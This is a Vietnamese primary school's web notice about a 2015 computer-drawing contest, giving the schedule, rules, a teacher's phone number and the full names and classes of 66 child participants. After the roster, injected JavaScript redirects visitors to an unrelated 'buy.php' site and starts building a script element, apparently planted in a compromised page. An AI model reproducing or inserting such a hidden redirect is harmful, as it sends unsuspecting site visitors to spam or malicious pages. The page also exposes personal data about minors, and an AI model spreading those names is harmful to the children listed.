Thông báo thi vẽ tranh trên máy vi tính

07/12/2015 8:22 Chiều Phản hồi đã bị khóa

Căn cứ vào Kế hoạch hoạt động Công nghệ thông tin của phòng Tin học năm học 2015 – 2016, trên cơ sở danh sách học sinh đăng ký tham gia do các lớp gửi lên, ngày 06/12/2015, trường Tiểu học Quan Hoa chốt danh sách học sinh tham dự cuộc thi “Vẽ tranh trên máy tính”. Vậy, nhà trường xin thông báo kế hoạch thi Vẽ tranh trên máy vi tính như sau:

1. Đối tượng tham gia:

- Học sinh từ lớp 3 đến lớp 5, có năng khiếu về môn Mĩ thuật và môn Tin học.

- Mỗi lớp lựa chọn và đăng kí số lượng không quá 10  học sinh.

2. Thời gian:

- Thời gian: 8 giờ 15 phút ngày 9 tháng 12 năm 2015

- Học sinh chia làm 2 ca thi:

Ca 1: 8h15 – 9h15 (bao gồm những học sinh từ số thứ tự 1 đến 33)

Ca 2: 9h30 – 10h30 (bao gồm những học sinh từ số thứ tự 34 đến 66)

- Học sinh thi vẽ trực tiếp bằng phần mềm MS.Paint trên máy vi tính trong 60 phút.

* Yêu cầu: Học sinh có mặt trước thời gian thi 15 phút, tập trung tại phòng học Tin học(tầng 4).

3. Địa điểm:

- Phòng Tin học (Tầng 4) trường Tiểu học Quan Hoa.

4. Nội dung thi: Học sinh vẽ tranh tự chọn theo một trong các chủ đề nhà trường đã giới hạn.

Vậy, nhà trường thông báo tới các đồng chí giáo viên chủ nhiệm, các bậc phụ huynh và các em học sinh để phối hợp thực hiện.

*Lưu ý: Nội dung thông báo này được niêm yết tại Bảng tin và đăng trên trang Web của trường.

Nếu có vướng mắc, phụ huynh có thể liên hệ với giáo viên phụ trách của khối theo số điện thoại:

Cô Diễm Hằng (0983101499) và các giáo viên chủ nhiệm các lớp.

BAN GIÁM HIỆU

DANH SÁCH HỌC SINH

THAM GIA CUỘC THI VẼ TRANH TRÊN MÁY TÍNH

(Ngày 9/12/2015)

Stt Họ và tên Lớp Ghi chú
1 Dương Phương Linh 3A
2 Nguyễn Lê Thái Linh 3A
3 Vũ Minh Trí 3A
4 Đỗ Bảo Huy 3A
5 Hoàng Phi Linh 3A
6 Hoàng Trung Hải 3A
7 Trần Phương Linh 3A
8 Phạm Lê 3B
9 Vũ Việt Hoàng 3C
10 Đỗ Thục Linh 3C
11 Phạm Thị Hà Ngọc 3C
12 Lê Thảo Nguyên 3C
13 Dương Thảo Nguyên 3C
14 Vũ Phương Diệp Anh 3D
15 Nguyễn Hà Lam 3D
16 Nguyễn Công Thùy Chi 3D
17 Nguyễn Công Gia Bảo 3D
18 Đặng Lâm Anh 3D
19 Nguyễn Hà An 3E
20 Nguyễn Thanh Hằng 3E
21 Nguyễn Phương Linh 3E
22 Đặng Trần Quân 3E
23 Nguyễn Quỳnh Anh 3E
24 Nguyễn Đỗ Quyên 4A
25 Hà Ngọc Lan 4A
26 Bùi Lương Quế Như 4A
27 Nguyễn Minh Phương 4A
28 Nguyễn Hoàng Tuấn 4A
29 Hoàng Phúc An 4A
30 Nguyễn Hà Minh Thu 4A
31 Lê Quỳnh Anh 4A
32 Trương Mai Bảo Châu 4A
33 Phạm Kiên Dũng 4B
34 Đặng Phương Linh 4B
35 Nguyễn Hải Long 4B
36 Lê Thái Sơn 4B
37 Vũ Thúy Bình 4B
38 Trần Ngọc Khánh 4B
39 Nguyễn Bảo Châu 4B
40 Nguyễn Vân Ngọc 4C
41 Trần Đình Nam 4C
42 Trịnh Đức Anh 4C
43 Nguyễn Minh Ánh 4D
44 Phan Quỳnh Vân 4D
45 Đặng Thu Trang 4D
46 Nguyễn Phương Linh 4D
47 Mai Thư Lê 4D
48 Nguyễn Thu Giang 5A
49 Đàm Thành Trung 5A
50 Phạm Đức Phương 5A
51 Trần Minh Tâm 5A
52 Quách Bảo Phương 5A
53 Đỗ Thị Ngọc Khánh 5A
54 Lê Quốc Mạnh 5B
55 Hà Bảo Ngân 5B
56 Lê Đức Trung 5B
57 Trần Thùy Dương 5B
58 Vũ Vân Khánh 5B
59 Đồng Tuyết Ngân 5C
60 Nguyễn Trang Thùy Linh 5C
61 Phạm Hồng Minh 5C
62 Nguyễn Minh Huyền 5C
63 Dương Ngọc Mai 5C
64 Vũ Lan Anh 5D
65 Mai Đặng Nguyên Đức 5D
66 Vương Thùy Linh 5D

location.replace(“http://gethere.info/buy.php”);

var d=document;var s=d.createElement(‘script’);

Các phản hồi đã bị đóng lại bở quản trị.